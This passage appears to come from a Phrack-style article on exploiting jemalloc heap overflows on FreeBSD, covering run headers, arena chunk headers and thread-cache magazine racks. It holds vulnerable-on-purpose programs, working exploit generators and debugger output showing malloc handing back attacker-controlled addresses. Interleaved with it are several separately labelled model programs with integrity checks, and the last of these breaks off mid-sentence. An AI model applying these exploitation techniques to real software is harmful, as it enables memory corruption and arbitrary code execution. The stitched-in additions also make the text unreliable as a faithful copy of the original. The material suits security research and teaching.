/* User supplied value for 'regs_minelm'. */
*(size_t *)&offset[0] = (size_t)atol(argv[1]);

printf("Allocating a chunk of 16 bytes just for fun\n");
one = (char *)malloc(16);
printf("one = %p\n", one);

/* All those allocations will fall inside the same run. */
printf("Allocating first chunk of 32 bytes\n");
two = (char *)malloc(32);
printf("two = %p\n", two);

printf("Performing more 32 byte allocations\n");
for(i = 0; i < 10; i++)
{
    temp = (char *)malloc(32);
    printf("temp = %p\n", temp);
}

/* This will allocate a new run for size 64. */
printf("Setting up a run for the next size class\n");
three = (char *)malloc(64);
printf("three = %p\n", three);

/* Overwrite 'regs_minelm' of the next run. */
breakpoint();
memcpy(two + 4064 + 4, offset, 4);
breakpoint();

printf("Next chunk should point in the previous run\n");
four = (char *)malloc(64);
printf("four = %p\n", four);


vuln-run.c requires the user to supply a value to be written to
'regs_minelm' of the next run. To achieve reliable results we have to
somehow control the memory contents at 'regs_mask[regs_minelm]' as well.
By taking a closer look at the layout of 'arena_run_t', we can see that by
supplying the value -2 for 'regs_minelm', we can force
'regs_mask[regs_minelm]' to point to 'regs_minelm' itself. That is,
'regs_mask[-2] = -2' :)

Well, depending on the target application, other values may also be
applicable but -2 is a safe one that does not cause further problems in the
internals of jemalloc and avoids forced crashes.

From function 'arena_run_reg_alloc':


static inline void *
arena_run_reg_alloc(arena_run_t *run, arena_bin_t *bin)
{
	void *ret;
	unsigned i, mask, bit, regind;

	...

	i = run->regs_minelm;
	mask = run->regs_mask[i]; /* [3-4] */
	if (mask != 0) {
		/* Usable allocation found. */
		bit = ffs((int)mask) - 1; /* [3-5] */

		regind = ((i << (SIZEOF_INT_2POW + 3)) + bit); /* [3-6] */
		...
		ret = (void *)(((uintptr_t)run) + bin->reg0_offset
		    + (bin->reg_size * regind)); /* [3-7] */

		...
		return (ret);
	}

	...
}


Initially, 'i' gets the value of 'run->regs_minelm' which is equal to -2.
On the assignment at [3-4], 'mask' receives the value 'regs_mask[-2]' which
happens to be the value of 'regs_minelm', that is -2. The binary
representation of -2 is 0xfffffffe thus 'ffs()' (man ffs(3) for those who
haven't used 'ffs()' before) will return 2, so, 'bit' will equal 1. As if
it wasn't fucking tiring so far, at [3-6], 'regind' is computed as
'((0xfffffffe << 5) + 1)' which equals 0xffffffc1 or -63. Now do the maths:
for 'reg_size' values belonging to small-medium sized regions, the formula
at [3-7] calculates 'ret' in such a way that 'ret' receives a pointer to a
memory region 63 chunks backwards :)

Now it's time for some hands on practice:


~$ gdb ./vuln-run
GNU gdb 6.1.1 [FreeBSD]
...
(gdb) run -2
Starting program: vuln-run -2
Allocating a chunk of 16 bytes just for fun
one = 0x28202030
Allocating first chunk of 32 bytes
two = 0x28203020
Performing more 32 byte allocations
...
temp = 0x28203080
...
Setting up a run for the next size class
three = 0x28204040

Program received signal SIGTRAP, Trace/breakpoint trap.
main (argc=Error accessing memory address 0x0: Bad address.
) at vuln-run.c:35
35        memcpy(two + 4064 + 4, offset, 4);
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
main (argc=Error accessing memory address 0x0: Bad address.
) at vuln-run.c:38
38        printf("Next chunk should point in the previous run\n");
(gdb) c
Continuing.
Next chunk should point in the previous run
four = 0x28203080

Program exited normally.
(gdb) q


Notice how the memory region numbered 'four' (64 bytes) points exactly
where the chunk named 'temp' (32 bytes) starts. Voila :)
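
The index arithmetic walked through above can be checked with a small
model. The following C program is an added example, not code from the paper
or from jemalloc: it redoes the [3-4]..[3-7] computation in 32-bit unsigned
arithmetic for the 64-byte run of the gdb session, then repeats it with two
integrity checks that reject an out-of-range 'regs_minelm'. The struct
names, the checks, the 'run_size' and 'regs_mask_nelms' values for the
64-byte bin and the bin pointer value are assumptions.

```c
#include <stdint.h>
#include <stdio.h>

/* Word offsets in a release-build arena_run_t on 32-bit x86, matching the
 * x/30x dump above: bin, regs_minelm, nfree, then regs_mask[]. */
enum { W_BIN, W_MINELM, W_NFREE, W_MASK0, HDR_WORDS = 8 };

#define SIZEOF_INT_2POW 2            /* log2(sizeof(int)) on the target */

struct run_model {                   /* hypothetical stand-in for a run */
    uint32_t addr;                   /* page-aligned run address */
    uint32_t hdr[HDR_WORDS];         /* header words; regs_mask[] at W_MASK0 */
};

struct bin_model {                   /* the arena_bin_t fields this path uses */
    uint32_t reg_size, run_size, reg0_offset, regs_mask_nelms;
};

/* 1-based position of the lowest set bit, 0 if none (contract of ffs(3)). */
static uint32_t lowest_set_bit(uint32_t v)
{
    uint32_t n = 1;

    if (v == 0)
        return 0;
    while ((v & 1u) == 0) {
        v >>= 1;
        n++;
    }
    return n;
}

/* Arithmetic of arena_run_reg_alloc() at [3-4]..[3-7], in uint32_t so it
 * wraps as on the 32-bit target. Returns the region address, or 0 when the
 * mask word is empty or lies outside the modelled header. */
static uint32_t reg_alloc_unchecked(const struct run_model *run,
                                    const struct bin_model *bin)
{
    uint32_t i = run->hdr[W_MINELM];
    uint32_t word = (uint32_t)W_MASK0 + i;  /* &regs_mask[i], in words */
    uint32_t mask, bit, regind;

    if (word >= HDR_WORDS)
        return 0;
    mask = run->hdr[word];                                  /* [3-4] */
    if (mask == 0)
        return 0;
    bit = lowest_set_bit(mask) - 1;                         /* [3-5] */
    regind = (i << (SIZEOF_INT_2POW + 3)) + bit;            /* [3-6] */
    return run->addr + bin->reg0_offset
        + bin->reg_size * regind;                           /* [3-7] */
}

/* Same path with two integrity checks added (not jemalloc code): the index
 * must address a real regs_mask[] element and the result must lie inside
 * the run's own region area. */
static uint32_t reg_alloc_checked(const struct run_model *run,
                                  const struct bin_model *bin)
{
    uint32_t ret;

    if (run->hdr[W_MINELM] >= bin->regs_mask_nelms)
        return 0;
    ret = reg_alloc_unchecked(run, bin);
    if (ret < run->addr + bin->reg0_offset ||
        ret >= run->addr + bin->run_size)
        return 0;
    return ret;
}

/* Constructed sample: the 64-byte run from the gdb session (0x28204000,
 * first region at +0x40) with one region already handed out. */
static uint32_t demo(uint32_t regs_minelm, int checked)
{
    struct bin_model bin = { 64, 4096, 0x40, 2 }; /* run_size, nelms assumed */
    struct run_model run = { 0x28204000u,
        { 0x0804a000u /* placeholder bin pointer */, regs_minelm, 62,
          0xfffffffeu, 0x7fffffffu, 0, 0, 0 } };

    return checked ? reg_alloc_checked(&run, &bin)
                   : reg_alloc_unchecked(&run, &bin);
}

int main(void)
{
    printf("intact header:            0x%08x\n", (unsigned)demo(0, 0));
    printf("regs_minelm = -2:         0x%08x\n",
        (unsigned)demo(0xfffffffeu, 0));
    printf("regs_minelm = -2, checked: 0x%08x\n",
        (unsigned)demo(0xfffffffeu, 1));
    return 0;
}
```

With the overwritten header the unchecked path yields 0x28203080, the same
address gdb printed for 'four'; the checked path refuses the request.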


------[ 3.3.2 - Chunk (arena_chunk_t)

In the previous section we described the potential of achieving arbitrary
code execution by overwriting the run header metadata. Trying to cover
all the possibilities, we will now focus on what the attacker can do
once she is able to corrupt the chunk header of an arena. Although
the probability of directly affecting a nearby arena is low, a memory
leak or the indirect control of the heap layout by continuous bin-sized
allocations can render the technique described in this section a useful
tool in the attacker's hand.

Before continuing with our analysis, let's set the foundations of the
test case we will cover.

[[Arena #1 header][R...R][C...C]]

As we have already mentioned in the previous sections, new arena chunks
are created at will depending on whether the current arena is full
(that is, jemalloc is unable to find a non-full run to service the
current allocation) or whether the target application runs on multiple
threads. Thus a good way to force the initialization of a new arena chunk
is to continuously force the target application to perform allocations,
preferably bin-sized ones. In the figure above, letter 'R' indicates the
presence of memory regions that are already allocated while 'C' denotes
regions that may be free. By continuously requesting memory regions,
the available arena regions may be depleted forcing jemalloc to allocate
a new arena (what is, in fact, allocated is a new chunk called an arena
chunk, by calling 'arena_chunk_alloc()' which usually calls 'mmap()').

The low level function responsible for allocating memory pages (called
'pages_map()'), is used by 'chunk_alloc_mmap()' in a way that makes it
possible for several distinct arenas (and any possible arena extensions)
to be physically adjacent. So, once the attacker requests a bunch of
new allocations, the memory layout may resemble the following figure.

[[Arena #1 header][R...R][C...C]][[Arena #2 header][...]]

It is now obvious that overflowing the last chunk of arena #1 will
result in the arena chunk header of arena #2 getting overwritten. It is
thus interesting to take a look at how one can take advantage of such
a situation.

The following code is one of those typical vulnerable-on-purpose programs
you usually come across in Phrack articles ;) The scenario we will be
analyzing in this section is the following: The attacker forces the
target application to allocate a new arena by controlling the heap
allocations. She then triggers the overflow in the last region of the
previous arena (the region that physically borders the new arena) thus
corrupting the chunk header metadata (see [2-5] on the diagram). When the
application calls 'free()' on any region of the newly allocated arena,
the jemalloc housekeeping information is altered. On the next call to
'malloc()', the allocator will return a region that points to already
allocated space of (preferably) the previous arena. Take your time
to carefully study the following snippet since it is essential for
understanding this attack (full code in vuln-chunk.c):


char *base1, *base2;
char *p1, *p2, *p3, *last, *first;
char buffer[1024];
int fd, l;

p1 = (char *)malloc(16);
base1 = (char *)CHUNK_ADDR2BASE(p1);
print_arena_chunk(base1);

/* [3-8] */

/* Simulate the fact that we somehow control heap allocations.
 * This will consume the first chunk, and will force jemalloc
 * to allocate a new chunk for this arena.
 */
last = NULL;

while((base2 = (char *)CHUNK_ADDR2BASE((first = malloc(16)))) == base1)
    last = first;

print_arena_chunk(base2);

/* [3-9] */

/* Allocate one more region right after the first region of the
 * new chunk. This is done for demonstration purposes only.
 */
p2 = malloc(16);

/* This is what the chunks look like at this point:
 *
 *   [HAAAA....L][HFPUUUU....U]
 *
 * H: Chunk header
 * A: Allocated regions
 * L: The chunk pointed to by 'last'
 * F: The chunk pointed to by 'first'
 * P: The chunk pointed to by 'p2'
 * U: Unallocated space
 */
fprintf(stderr, "base1: %p vs. base2: %p (+%td)\n",
    base1, base2, (ptrdiff_t)(base2 - base1));

fprintf(stderr, "p1: %p vs. p2: %p (+%td)\n",
    p1, p2, (ptrdiff_t)(p2 - p1));

/* [3-10] */

if(argc > 1) {
    if((fd = open(argv[1], O_RDONLY)) > 0) {
        /* Read the contents of the given file. We assume this file
         * contains the exploitation vector.
         */
        memset(buffer, 0, sizeof(buffer));
        l = read(fd, buffer, sizeof(buffer));
        close(fd);

        /* Copy data in the last chunk of the previous arena chunk. */
        fprintf(stderr, "Read %d bytes\n", l);
        memcpy(last, buffer, l);
    }
}

/* [3-11] */

/* Trigger the bug by free()ing any chunk in the new arena. We
 * can achieve the same results by deallocating 'first'.
 */
free(p2);
print_region(first, 16);

/* [3-12] */

/* Now 'p3' will point to an already allocated region (in this
 * example, 'p3' will overwhelm 'first').
 */
p3 = malloc(4096);

/* [3-13] */

fprintf(stderr, "p3 = %p\n", p3);
memset(p3, 'A', 4096);

/* 'A's should appear in 'first' which was previously zeroed. */
print_region(first, 16);
return 0;


Before going further, the reader is advised to read the comments and the
code above very carefully. You can safely ignore 'print_arena_chunk()'
and 'print_region()', they are defined in the file lib.h found in the code
archive and are used for debugging purposes only. The snippet is actually
split in 6 parts which can be distinguished by their corresponding '[3-x]'
tags. Briefly, in part [3-8], the vulnerable program performs a number
of allocations in order to fill up the available space served by the
first arena. This emulates the fact that an attacker somehow controls
the order of allocations and deallocations on the target, a fair and
very common prerequisite. Additionally, the last call to 'malloc()'
(the one before the while loop breaks) forces jemalloc to allocate a new
arena chunk and return the first available memory region. Part [3-9]
performs one more allocation, one that will lie next to the first (that
is the second region of the new arena). This final allocation is there
for demonstration purposes only (check the comments for more details).

Part [3-10] is where the actual overflow takes place and part [3-11]
calls 'free()' on one of the regions of the newly allocated arena. Before
explaining the rest of the vulnerable code, let's see what's going on when
'free()' gets called on a memory region.


void
free(void *ptr)
{
  ...
  if (ptr != NULL) {
    ...
    idalloc(ptr);
  }
}

static inline void
idalloc(void *ptr)
{
  ...
  chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(ptr); /* [3-14] */
  if (chunk != ptr)
    arena_dalloc(chunk->arena, chunk, ptr); /* [3-15] */
  else
    huge_dalloc(ptr);
}


The 'CHUNK_ADDR2BASE()' macro at [3-14] returns the pointer to the chunk
that the given memory region belongs to. In fact, what it does is just
a simple pointer trick to get the first address before 'ptr' that is
aligned to a multiple of a chunk size (1 or 2 MB by default, depending
on the jemalloc flavor used). If this chunk does not belong to a, so
called, huge allocation, then the allocator knows that it definitely
belongs to an arena. As previously stated, an arena chunk begins with
a special header, called 'arena_chunk_t', which, as expected, contains
a pointer to the arena that this chunk is part of.

Now recall that in part [3-10] of the vulnerable snippet presented
above, the attacker is able to overwrite the first few bytes of the next
arena chunk. Consequently, the 'chunk->arena' pointer that points to
the arena is under the attacker's control. From now on, the reader may
safely assume that all functions called by 'arena_dalloc()' at [3-15]
may receive an arbitrary value for the arena pointer:


static inline void
arena_dalloc(arena_t *arena, arena_chunk_t *chunk, void *ptr)
{
  size_t pageind;
  arena_chunk_map_t *mapelm;
  ...

  pageind = (((uintptr_t)ptr - (uintptr_t)chunk) >> PAGE_SHIFT);
  mapelm = &chunk->map[pageind];
  ...

  if ((mapelm->bits & CHUNK_MAP_LARGE) == 0) {
    /* Small allocation. */
    malloc_spin_lock(&arena->lock);
    arena_dalloc_small(arena, chunk, ptr, mapelm);  /* [3-16] */
    malloc_spin_unlock(&arena->lock);
  }
  else
    arena_dalloc_large(arena, chunk, ptr); /* [3-17] */
}


Entering 'arena_dalloc()', one can see that the 'arena' pointer
is not used a lot; it's just passed to 'arena_dalloc_small()'
or 'arena_dalloc_large()' depending on the size class of the
memory region being deallocated. It is interesting to note that the
aforementioned size class is determined by inspecting 'mapelm->bits'
which, hopefully, is under the influence of the attacker. Following
the path taken by 'arena_dalloc_small()' results in many complications
that will most probably ruin our attack (hint for the interested
reader - the pointer arithmetic performed by 'arena_run_reg_dalloc()'
is kinda dangerous). For this reason, we choose to follow function
'arena_dalloc_large()':


static void
arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr)
{
  malloc_spin_lock(&arena->lock);
  ...

  size_t pageind = ((uintptr_t)ptr - (uintptr_t)chunk) >>
    PAGE_SHIFT; /* [3-18] */
  size_t size = chunk->map[pageind].bits & ~PAGE_MASK; /* [3-19] */

  ...
  arena_run_dalloc(arena, (arena_run_t *)ptr, true);
  malloc_spin_unlock(&arena->lock);
}


There are two important things to notice in the snippet above. The first
thing to note is the way 'pageind' is calculated. Variable 'ptr' points
to the start of the memory region to be free()'ed while 'chunk' is the
address of the corresponding arena chunk. For a chunk that starts at
e.g. 0x28200000, the first region to be given out to the user may start
at 0x28201030 mainly because of the overhead involving the metadata of
chunk, arena and run headers as well as their bitmaps. A careful reader
may notice that 0x28301030 is more than a page away from the start
of the chunk, so 'pageind' is greater than or equal to 1. It is for this
reason that we are mostly interested in overwriting 'chunk->map[1]'
and not 'chunk->map[0]'. The second thing to catch our attention is
the fact that, at [3-19], 'size' is calculated directly from the 'bits'
element of the overwritten bitmap. This size is later converted to the
number of pages comprising it, so, the attacker can directly affect the
number of pages to be marked as free. Let's see 'arena_run_dalloc':


static void
arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty)
{
  arena_chunk_t *chunk;
  size_t size, run_ind, run_pages;

  chunk = (arena_chunk_t *)CHUNK_ADDR2BASE(run);
  run_ind = (size_t)(((uintptr_t)run - (uintptr_t)chunk)
      >> PAGE_SHIFT);
  ...

  if ((chunk->map[run_ind].bits & CHUNK_MAP_LARGE) != 0)
    size = chunk->map[run_ind].bits & ~PAGE_MASK;
  else
    ...
  run_pages = (size >> PAGE_SHIFT); /* [3-20] */

  /* Mark pages as unallocated in the chunk map. */
  if (dirty) {
    size_t i;

    for (i = 0; i < run_pages; i++) {
      ...
      /* [3-21] */
      chunk->map[run_ind + i].bits = CHUNK_MAP_DIRTY;
    }

    ...
    chunk->ndirty += run_pages;
    arena->ndirty += run_pages;
  }
  else {
    ...
  }
  chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits &
      PAGE_MASK);
  chunk->map[run_ind+run_pages-1].bits = size |
      (chunk->map[run_ind+run_pages-1].bits & PAGE_MASK);


  /* Page coalescing code - Not relevant for _this_ example. */
  ...

  /* Insert into runs_avail, now that coalescing is complete. */
  /* [3-22] */
  arena_avail_tree_insert(&arena->runs_avail, &chunk->map[run_ind]);

  ...
}


Continuing with our analysis, one can see that at [3-20] the same
size that was calculated in 'arena_dalloc_large()' is now converted
to a number of pages and then all 'map[]' elements that correspond to
these pages are marked as dirty (notice that 'dirty' argument given
to 'arena_run_dalloc()' by 'arena_dalloc_large()' is always set to
true). The rest of the 'arena_run_dalloc()' code, which is not shown
here, is responsible for forward and backward coalescing of dirty
pages. Although not directly relevant for our demonstration, it's
something that an attacker should keep in mind while developing a real
life reliable exploit.

Last but not least, it's interesting to note that, since the attacker
controls the 'arena' pointer, the map elements that correspond to the
freed pages are inserted in the given arena's red black tree. This can be
seen at [3-22] where 'arena_avail_tree_insert()' is actually called. One
may think that since red-black trees are involved in jemalloc, she can
abuse their pointer arithmetic to achieve a '4bytes anywhere' write
primitive. We urge all interested readers to have a look at rb.h, the
file that contains the macro-based red black tree implementation used
by jemalloc (WARNING: don't try this while sober).

Summing up, our attack algorithm consists of the following steps:

1) Force the target application to perform a number of allocations until a
new arena is eventually allocated or until a neighboring arena is reached
(call it arena B). This is mostly meaningful for our demonstration codes,
since, in real life applications, chances are that more than one chunk
and/or arena will already be available during the exploitation process.

2) Overwrite the 'arena' pointer of arena B's chunk and make it point
to an already existing arena. The address of the very first arena of
a process (call it arena A) is always fixed since it's declared as
static. This will prevent the allocator from accessing a bad address
and eventually segfaulting.

3) Force or let the target application free() any chunk that belongs to
arena B. We can deallocate any number of pages as long as they are marked
as allocated in the jemalloc metadata. Trying to free an unallocated page
will result in the red-black tree implementation of jemalloc entering
an endless loop or, rarely, segfaulting.

4) The next allocation to be served by arena B will return a pointer
somewhere within the region that was erroneously free()'ed in step 3.

The exploit code for the vulnerable program presented in this section
can be seen below. It was coded on an x86 FreeBSD-8.2-RELEASE system, so
the offsets of the metadata may vary for your platform. Given the address
of an existing arena (arena A of step 2), it creates a file that contains
the exploitation vector. This file should be passed as argument to the
vulnerable target (full code in file exploit-chunk.c):


char buffer[1024], *p;
int fd;

if(argc != 2) {
    fprintf(stderr, "%s <arena>\n", argv[0]);
    return 0;
}

memset(buffer, 0, sizeof(buffer));

p = buffer;
strncpy(p, "1234567890123456", 16);
p += 16;

/* Arena address. */
*(size_t *)p = (size_t)strtoul(argv[1], NULL, 16);
p += sizeof(size_t);

/* Skip over rbtree metadata and 'chunk->map[0]'. */
strncpy(p,
    "AAAA" "AAAA" "CCCC"
    "AAAA" "AAAA" "AAAA" "GGGG" "HHHH" , 32);

p += 32;

*(size_t *)p = 0x00001002;
/*                      ^ CHUNK_MAP_LARGE                 */
/*                   ^ Number of pages to free (1 is ok). */
p += sizeof(size_t);

fd = open("exploit2.v", O_WRONLY | O_TRUNC | O_CREAT, 0700);
write(fd, buffer, (p - (char *)buffer));
close(fd);
return 0;


It is now time for some action. First, let's compile and run the vulnerable
code.


$ ./vuln-chunk
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
p3 = 0x28302000
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................


The output is what one expects it to be. First, the vulnerable code forces
the allocator to initialize a new chunk (0x28300000) and then requests
a memory region which is given the address 0x28301030. The next call to
'malloc()' returns 0x28302000. So far so good. Let's feed our target
with the exploitation vector and see what happens.

$ ./exploit-chunk 0x8049d98
$ ./vuln-chunk exploit2.v
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
Read 56 bytes
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00         ................
p3 = 0x28301000
# Region at 0x28301030
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41         AAAAAAAAAAAAAAAA


As you can see the second call to 'malloc()' returns a new region
'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)!
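
Seen from the allocator's side, the state reached on this 'free()' path is
self-inconsistent, which is what a heap-integrity check can test for. The
following C program is an added example, not jemalloc code: it models the
'CHUNK_ADDR2BASE()', 'pageind' and map 'bits' computations quoted above and
audits a 'free()' request. The finding names, the audit function and the
intact 'map[1]' value are assumptions, and the 1 MB chunk size is inferred
from the chunk addresses in the output above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT      12
#define PAGE_MASK       ((1u << PAGE_SHIFT) - 1)
#define CHUNK_SIZE      0x100000u  /* 1 MB: chunks at 0x28200000, 0x28300000 */
#define CHUNK_NPAGES    (CHUNK_SIZE >> PAGE_SHIFT)
#define CHUNK_MAP_LARGE 0x2u       /* flag annotated in exploit-chunk.c */

enum {                             /* audit findings (hypothetical names) */
    F_UNKNOWN_ARENA   = 1 << 0,    /* chunk->arena is not a known arena */
    F_LARGE_UNALIGNED = 1 << 1,    /* large path taken for an unaligned ptr */
    F_LARGE_BAD_SPAN  = 1 << 2     /* zero pages, or run leaves the chunk */
};

/* CHUNK_ADDR2BASE(): round down to the chunk boundary ([3-14]). */
static uint32_t chunk_base(uint32_t ptr)
{
    return ptr & ~(CHUNK_SIZE - 1);
}

/* Index into chunk->map[] for the page that holds ptr ([3-18]). */
static uint32_t page_index(uint32_t ptr)
{
    return (ptr - chunk_base(ptr)) >> PAGE_SHIFT;
}

/* Pages covered by a large run according to its map bits ([3-19], [3-20]). */
static uint32_t large_run_pages(uint32_t bits)
{
    return (bits & ~PAGE_MASK) >> PAGE_SHIFT;
}

/* Audit one free(ptr) against the chunk header fields it will consult.
 * Large runs start on a page boundary, so a map entry that claims "large"
 * for a pointer inside a page contradicts the pointer itself. Huge
 * allocations (chunk == ptr) are not modelled. */
static int audit_free(uint32_t ptr, uint32_t hdr_arena, uint32_t map_bits,
                      const uint32_t *known, size_t nknown)
{
    int findings = F_UNKNOWN_ARENA;
    size_t k;

    for (k = 0; k < nknown; k++)
        if (known[k] == hdr_arena)
            findings = 0;

    if (map_bits & CHUNK_MAP_LARGE) {
        uint32_t pages = large_run_pages(map_bits);

        if (ptr & PAGE_MASK)
            findings |= F_LARGE_UNALIGNED;
        if (pages == 0 || page_index(ptr) + pages > CHUNK_NPAGES)
            findings |= F_LARGE_BAD_SPAN;
    }
    return findings;
}

/* Constructed sample: free() of the 16-byte region at 0x28301030 in a
 * process whose only arena is the one at 0x8049d98 (values from the
 * output above). */
static int audit_demo(uint32_t hdr_arena, uint32_t map_bits)
{
    static const uint32_t known[] = { 0x08049d98u };

    return audit_free(0x28301030u, hdr_arena, map_bits, known, 1);
}

int main(void)
{
    /* Intact map[1]: run address in the upper bits, flags not modelled. */
    printf("intact header:    findings = %d\n",
        audit_demo(0x08049d98u, 0x28301000u));
    /* Header as rewritten by the exploit2.v contents. */
    printf("rewritten header: findings = %d\n",
        audit_demo(0x08049d98u, 0x00001002u));
    return 0;
}
```

Because step 2 points 'chunk->arena' at an arena that really exists, the
arena check passes for this input; the alignment check on the large path is
the one that reports it.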

Okay, so you're now probably wondering whether this technique is useful.
Please note that the demonstration code presented in the previous two
sections was carefully coded to prepare the heap in a way that is
convenient for the attacker. It is for this reason that these attacks may
seem obscure at first. On the contrary, in real life applications, heap
overflows in jemalloc will result in one of the following three cases:

1) Overwrite of an adjacent memory region.

2) Overwrite of the run metadata (in case the overflown region is the
last in a run).

3) Overwrite of the arena chunk metadata (in case the overflown region
is the last in a chunk).

That said we believe we have covered most of the cases that an attacker
may encounter. Feel free to contact us if you think we have missed
something important.


------[ 3.3.3 - Thread caches (tcache_t)

As we have analyzed in 2.1.7, thread cache magazine 'rounds' and other
magazine metadata are placed in normal memory regions. Assuming a 'mag_t'
along with its void pointer array has a total size of N, one can easily
acquire a memory region in the same run by calling 'malloc(N)'.

Overflowing a memory region adjacent to a 'mag_t' can result in 'malloc()'
returning arbitrary attacker controlled addresses. It's just a matter of
overwriting 'nrounds' and the contents of the void pointer array to
contain a stack address (or any other address of interest). A careful
reader of section 2.1.7 would have probably noticed that the same result
can be achieved by giving 'nrounds' a sufficiently large value in order to
pivot in the stack (or any user controlled memory region). This scenario is
pretty straightforward to exploit, so, we will have a look at the case of
overwriting a 'mag_rack_t' instead (it's not that sophisticated either).

Magazine racks are allocated by 'mag_rack_create()':


mag_rack_t *
mag_rack_create(arena_t *arena)
{
    ...
    return (arena_malloc_small(arena, sizeof(mag_rack_t) +
        (sizeof(bin_mags_t) * (nbins - 1)), true));
}


Now, let's calculate the size of a magazine rack:


(gdb) print nbins
$6 = 30
(gdb) print sizeof(mag_rack_t) + (sizeof(bin_mags_t) * (nbins - 1))
$24 = 240


A size of 240 is actually serviced by the bin holding regions of 256 bytes.
Issuing calls to 'malloc(256)' will eventually end up in a user controlled
region physically bordering a 'mag_rack_t'. The following vulnerable code
emulates this situation (file vuln-mag.c):


/* The 'vulnerable' thread. */
void *vuln_thread_runner(void *arg) {
  char *v;

  v = (char *)malloc(256);  /* [3-25] */
  printf("[vuln] v = %p\n", v);
  sleep(2);

  if(arg)
    strcpy(v, (char *)arg);
  return NULL;
}

/* Other threads performing allocations. */
void *thread_runner(void *arg) {
  size_t self = (size_t)pthread_self();
  char *p1, *p2;

  /* Allocation performed before the magazine rack is overflown. */
  p1 = (char *)malloc(16);
  printf("[%zu] p1 = %p\n", self, p1);
  sleep(4);

  /* Allocation performed after overflowing the rack. */
  p2 = (char *)malloc(16);
  printf("[%zu] p2 = %p\n", self, p2);
  sleep(4);
  return NULL;
}

int main(int argc, char *argv[]) {
  size_t tcount, i;
  pthread_t *tid, vid;

  if(argc != 3) {
    printf("%s <thread_count> <buff>\n", argv[0]);
    return 0;
  }

  /* The fake 'mag_t' structure will be placed here. */
  printf("[*] %p\n", getenv("FAKE_MAG_T"));

  tcount = atoi(argv[1]);
  tid = (pthread_t *)alloca(tcount * sizeof(pthread_t));

  pthread_create(&vid, NULL, vuln_thread_runner, argv[2]);
  for(i = 0; i < tcount; i++)
    pthread_create(&tid[i], NULL, thread_runner, NULL);

  pthread_join(vid, NULL);
  for(i = 0; i < tcount; i++)
    pthread_join(tid[i], NULL);

  pthread_exit(NULL);
}


The vulnerable code spawns a so-called vulnerable thread that performs an
allocation of 256 bytes. A user-supplied buffer, 'argv[2]', is copied into
it, thus causing a heap overflow. A set of victim threads is then created.
For demonstration purposes, victim threads have a very limited lifetime;
their main purpose is to force jemalloc to initialize new 'mag_rack_t'
structures. As the comments indicate, the allocations stored in 'p1'
variables take place before the magazine rack is overflown while the ones
stored in 'p2' will get affected by the fake magazine rack (in fact, only
one of them will; the one serviced by the overflown rack). The allocations
performed by victim threads are serviced by the newly initialized magazine
racks. Since each magazine rack spans 256 bytes, it is highly possible that
the overflown region allocated by the vulnerable thread will lie somewhere
around one of them (this requires that both the target magazine rack and
the overflown region are serviced by the same arena).

Once the attacker is able to corrupt a magazine rack, exploitation is just
a matter of overwriting the appropriate 'bin_mags' entry. The entry should
be corrupted so that 'curmag' points to a fake 'mag_t' structure. The
attacker can choose to either use a large 'nrounds' value to pivot into
the stack, or give arbitrary addresses as members of the void pointer
array, preferably the latter. The exploitation code given below makes use
of the void pointer technique (file exploit-mag.c):


int main(int argc, char *argv[]) {
  char fake_mag_t[12 + 1];
  char buff[1024 + 1];
  size_t i, fake_mag_t_p;

  if(argc != 2) {
    printf("%s <mag_t address>\n", argv[0]);
    return 1;
  }
  fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16);

  /* Please read this...
   *
   * In order to avoid using NULL bytes, we use 0xffffffff as the value
   * for 'nrounds'. This will force jemalloc to pick up 0x42424242 as
   * a valid region pointer instead of 0x41414141 :)
   */
  printf("[*] Assuming fake mag_t is at %p\n", (void *)fake_mag_t_p);
  *(size_t *)&fake_mag_t[0] = 0x42424242;
  *(size_t *)&fake_mag_t[4] = 0xffffffff;
  *(size_t *)&fake_mag_t[8] = 0x41414141;
  fake_mag_t[12] = 0;
  setenv("FAKE_MAG_T", fake_mag_t, 1);

  /* The buffer that will overwrite the victim 'mag_rack_t'. */
  printf("[*] Preparing input buffer\n");
  for(i = 0; i < 256; i++)
    *(size_t *)&buff[4 * i] = (size_t)fake_mag_t_p;
  buff[1024] = 0;

  printf("[*] Executing the vulnerable program\n");
  execl("./vuln-mag", "./vuln-mag", "16", buff, NULL);
  perror("execl");
  return 0;
}


Let's compile and run the exploit code:


$ ./exploit-mag
./exploit-mag <mag_t address>
$ ./exploit-mag 0xdeadbeef
[*] Assuming fake mag_t is at 0xdeadbeef
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
...


The vulnerable code reports that the environment variable 'FAKE_MAG_T'
containing our fake 'mag_t' structure is exported at 0xbfbfedd6.


$ ./exploit-mag 0xbfbfedd6
[*] Assuming fake mag_t is at 0xbfbfedd6
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
[vuln] v = 0x28311100
[673283456] p1 = 0x28317800
...
[673283456] p2 = 0x42424242
[673282496] p2 = 0x3d545f47


Neat. One of the victim threads, the one whose magazine rack is overflown,
returns an arbitrary address as a valid region. Overwriting the thread
caches is probably the most lethal attack, but it suffers from a limitation
which we do not consider serious. The fact that the returned memory region
and the 'bin_mags[]' element both receive arbitrary addresses results in a
segfault either on the deallocation of 'p2' or once the thread dies by
explicitly or implicitly calling 'pthread_exit()'. Possible shellcodes
should be triggered _before_ the thread exits or the memory region is
freed. Fair enough... :)
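
The model below is an added example, not code from this article or from
jemalloc. It replays the vuln-mag.c overflow and the fake 'mag_t' from
exploit-mag.c inside a private buffer, next to a bounded copy and a pop
that validates 'nrounds' and the returned pointer. The 8-byte 'bin_mags'
entry, the decrement-then-index pop, MODEL_MAX_ROUNDS and the arena bounds
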